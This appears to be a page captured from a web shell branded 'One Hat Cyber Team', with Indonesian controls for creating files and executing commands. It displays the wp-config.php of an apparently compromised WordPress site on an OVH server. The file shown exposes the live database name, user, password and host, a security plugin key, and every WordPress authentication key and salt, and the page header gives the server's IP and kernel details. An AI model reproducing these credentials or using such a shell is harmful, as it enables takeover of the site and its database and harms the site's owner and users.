⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
92.222.139.190
Server:
Linux webd002.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
mspfmsm
/
sifo
/
Viewing : wp-config.php
<?php define( 'WP_CACHE', true /* Modified by NitroPack */ ); //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', 'DF5nXSUUM3Xg4eMP3HBvV7utXIQfIZgCFc5rchLWvZ7NXorTwHWgSCx0BVtKj1Bx'); //END Really Simple Security key /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mspfmsmadriana' ); /** Database username */ define( 'DB_USER', 'mspfmsmadriana' ); /** Database password */ define( 'DB_PASSWORD', 'Adriana94MxT' ); /** Database hostname */ define( 'DB_HOST', 'mspfmsmadriana.mysql.db' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define('DISALLOW_FILE_EDIT', false); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', ';%6=i5pN=83[T7V.^11JR,NhhN}:1UfG&-e2gm0@xD&ET^Y74%ui{I/Y/228vNwh' ); define( 'SECURE_AUTH_KEY', 'E>F7j?EpfWT-G$b/lJ>cEgtngz2`3Ahx*nWkkOPIw;R;J|p/}uq22oS~4*N(hJ)W' ); define( 'LOGGED_IN_KEY', '(Q}DZeb^qYsMdkz~`_Ab03t_T$i}zg>$/;/|7<D(y.tbnYuI0D%cb7CbJlnaBtOb' ); define( 'NONCE_KEY', 'JR8$#VR6w:U9qI*e;UuXR|xE4AOp0H;3$)FTvQg2-*[4.^ZnWV!_h`X5BF-fIf:K' ); define( 'AUTH_SALT', '0Hd,Dc4ous]Vr4goO1,(Exn{t+<EBXoG}CVlpV+KU/54h!LY6)k]Nava3a]#wubx' ); define( 'SECURE_AUTH_SALT', '}OLxV,GQGRc~|Mp$^I9{zMKdy*oC/5{znRYbN4`H-rSZ@+-#R<Va,@S<2elf!?}2' ); define( 'LOGGED_IN_SALT', '^gFZ?]D=Bmmc10R+AN)#x:G%p~t|>e6;7&up+(-&G+KMKV~+jn7SSc8.{)j@8GN1' ); define( 'NONCE_SALT', '@dfaDH&>t:K#X:fCw$#k_uy*3iTz6K=[kYU,UN.#S{B;VLFO4]+ r4{G^`QOGP6J' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpsifo_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'DISALLOW_FILE_MODS', true ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';